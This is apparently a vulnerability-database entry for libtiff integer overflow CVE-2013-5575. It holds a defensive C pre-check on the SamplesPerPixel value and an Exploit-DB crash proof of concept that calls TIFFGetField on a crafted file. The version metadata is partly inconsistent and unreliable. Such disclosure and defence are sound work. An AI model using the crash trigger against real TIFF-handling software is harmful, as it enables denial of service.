Vendor: libtiff
By: x90c
CVSS: 7.5 (HIGH)
CWE: 190 (Integer overflow)
Product Name: libtiff
Affected Version From: 3.9.5
Affected Version To: 3.6.0
Patch Exists: YES
Related CVE: CVE-2013-5575
CPE: a:libtiff:libtiff
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2013

libtiff <= 3.9.5 Integer overflow bug poc

Proof-of-concept code for an integer overflow vulnerability in libtiff versions 3.9.5 and below. The vulnerability is triggered when the TIFFGetField library function is called with a malicious samplesperpixel field value, resulting in a segmentation fault.

Mitigation:

Upgrade to a version of libtiff that is not vulnerable to this issue.
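
As an added example (not part of the original PoC or of libtiff): a pre-screening check an application can run on untrusted input before handing it to libtiff, reading the SamplesPerPixel tag directly from the first IFD and rejecting out-of-policy values. The function name, return codes, the MAX_SPP limit and the two byte arrays are assumptions constructed for illustration; the check does not replace upgrading.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define TAG_SAMPLESPERPIXEL 277 /* value of TIFFTAG_SAMPLESPERPIXEL */
#define TYPE_SHORT 3
#define MAX_SPP 8               /* assumed application policy limit */

/* Read an n-byte unsigned field in the file's byte order (le: "II"). */
static uint32_t rd(const uint8_t *p, int n, int le) {
    uint32_t v = 0;
    for (int i = 0; i < n; i++)
        v |= (uint32_t)p[i] << (8 * (le ? i : n - 1 - i));
    return v;
}

/* 0 = acceptable, -1 = malformed/truncated, -2 = SamplesPerPixel rejected.
 * Only the first IFD is inspected; every offset is checked against len. */
int tiff_spp_precheck(const uint8_t *buf, size_t len) {
    int le;
    if (len < 8) return -1;
    if (buf[0] == 'I' && buf[1] == 'I') le = 1;
    else if (buf[0] == 'M' && buf[1] == 'M') le = 0;
    else return -1;
    if (rd(buf + 2, 2, le) != 42) return -1;     /* classic TIFF magic */
    size_t ifd = rd(buf + 4, 4, le);
    if (ifd > len - 2) return -1;
    size_t n = rd(buf + ifd, 2, le);
    if (n * 12 > len - ifd - 2) return -1;
    for (size_t i = 0; i < n; i++) {
        const uint8_t *e = buf + ifd + 2 + i * 12;
        if (rd(e, 2, le) != TAG_SAMPLESPERPIXEL) continue;
        if (rd(e + 2, 2, le) != TYPE_SHORT || rd(e + 4, 4, le) != 1) return -2;
        uint32_t spp = rd(e + 8, 2, le);
        return (spp >= 1 && spp <= MAX_SPP) ? 0 : -2;
    }
    return 0; /* tag absent: the TIFF default of 1 applies */
}

/* Constructed samples: header + one-entry IFD, SamplesPerPixel 0xFFFF / 3. */
static const uint8_t SAMPLE_BAD[] = { 'I','I',42,0, 8,0,0,0, 1,0,
    0x15,0x01, 3,0, 1,0,0,0, 0xFF,0xFF,0,0, 0,0,0,0 };
static const uint8_t SAMPLE_OK[] = { 'M','M',0,42, 0,0,0,8, 0,1,
    0x01,0x15, 0,3, 0,0,0,1, 0,3,0,0, 0,0,0,0 };
int main(void) {
    printf("bad=%d ok=%d\n", tiff_spp_precheck(SAMPLE_BAD, sizeof SAMPLE_BAD),
           tiff_spp_precheck(SAMPLE_OK, sizeof SAMPLE_OK));
    return 0;
}
```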

Exploit-DB raw data:

/*
# Exploit Title: libtiff <= 3.9.5 Integer overflow bug poc
# Date: 2013/08/25
# Exploit Author: x90c
# Vendor Homepage: http://www.remotesensing.org/libtiff
# Version:
- libtiff 3.9.5 <=
# Tested on:
- libtiff 4.0.3
- libtiff 4.0.2
- libtiff 4.0.1
- libtiff 4.0.0 (safe)
- libtiff 3.9.5 (vulnerable) <=
- libtiff 3.6.0
# CVE : CVE-2013-5575

I submit the poc of libtiff bug and
attached original advisory too
I want to submit the poc, sample file only

http://www.x90c.org/advisories/xadv_2013001_libtiff.txt
*/


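#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "tiffio.h"

int tiff_integer_overflow_test(void)
{
    /* Path to the crafted sample file used by the original PoC. */
    TIFF *tif = TIFFOpen("/home/x90c/sample_spp.tif", "r");
    unsigned short samples = 0; /* SamplesPerPixel is a 16-bit field */

    /* Without this check a missing file crashes for an unrelated reason. */
    if (tif == NULL) {
        fprintf(stderr, "tiff_poc: cannot open sample file\n");
        return -1;
    }

    /*
     * For instance, the TIFFGetField library function is
     * called with a malicious samplesperpixel field value:
     * TIFFGetField segfaults!
     */
    TIFFGetField(tif, TIFFTAG_SAMPLESPERPIXEL, &samples);

    printf("tiff_poc: tif samplesperpixel field=%d\n", samples);
    TIFFClose(tif);
    return 0;
}

int main(void)
{
    return tiff_integer_overflow_test() == 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}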